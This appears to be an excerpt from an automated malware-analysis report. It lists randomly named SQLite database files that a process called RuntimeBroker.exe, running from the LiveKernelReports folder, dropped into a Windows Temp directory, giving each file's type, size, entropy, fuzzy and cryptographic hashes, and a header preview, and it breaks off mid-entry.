                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\oJaKlcKNx9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\oLwRAEvQSm

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\oPt4Zo3y0y

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\onXF6bxSWi

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\pBAzMx9yU8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\pOex5GZWCN

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ptVVUtKfdC

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qDslv6SWQW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qhBe2zarqf

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qi1lhJHdtZ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qks7JwbIqB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qm4BPtBlHw

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\qsD2FXqIxx

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\quFFMewy7h

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rAmfiyuYbR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rMxTBzZDTl

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rRwKpR0eEh

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rXYOrxVmy8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rscSikuYHt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\s2XBjhAtZB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\sVBMKaSpiW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tj5OZvDMsQ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\trlgFG8BRJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
